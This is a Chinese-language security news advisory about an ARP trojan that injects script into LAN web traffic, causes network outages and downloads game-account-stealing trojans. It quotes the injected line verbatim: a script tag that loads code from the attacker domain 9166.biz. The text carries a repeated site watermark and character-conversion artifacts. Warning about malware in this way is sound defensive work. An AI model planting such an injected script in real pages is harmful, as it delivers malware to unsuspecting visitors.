近日，360安全中心接到大量用戶的舉報，稱全局域網的電腦中都出現了彈出5y5.us或9166.biz等網頁，電腦被種植多個木馬病毒，時常斷網等現象。360安全中心的工程師隨即對此進行了分析。93a紅軟基地
9166.biz  ---ARP木馬病毒的惡意行為：93a紅軟基地

1.通過網頁漏洞傳播：該病毒通過植入網站上的一句JS腳本，導致有XML等漏洞的機器中招，成為此ARP病毒的傳播源93a紅軟基地

2.ARP攻擊篡改局域網數據包，一臺電腦中招，局域網內的所有用戶均遭殃：該病毒在整個局域網用戶上網的網頁中增加"<script src=http://9166.biz/w.js></script>"等內容，從而使局域網內有XML漏洞的電腦同時感染此病毒。93a紅軟基地

3.查殺困難，整個網絡不時掉線：由于遭受攻擊的局域網一般都是多臺電腦感染，同時發(fā)起ARP攻擊，因此整個局域網很不穩(wěn)定，時常掉線甚至癱瘓。而且由于機器之間互相感染，因此徹底查殺及恢復非常困難。93a紅軟基地

4.后臺下載多個熱門游戲木馬：該木馬會自動到網上下載夢幻、征途、江湖、魔域、武林外傳、奇跡世界、天龍八部、傳奇世界、完美國際、風云、魔獸、江湖、QQ幻想等十多款網絡游戲木馬，偷竊用戶游戲帳戶。93a紅軟基地

據360安全中心專家分析，此ARP木馬病毒已經導致了上百萬臺電腦感染，數萬個局域網絡頻臨癱瘓。360安全衛(wèi)士已經在第一時間推出了專殺工具，供受害用戶使用。同時，只要用戶使用360安全衛(wèi)士勤打系統(tǒng)補丁，就不會感染此木馬病毒，防患于未然。93a紅軟基地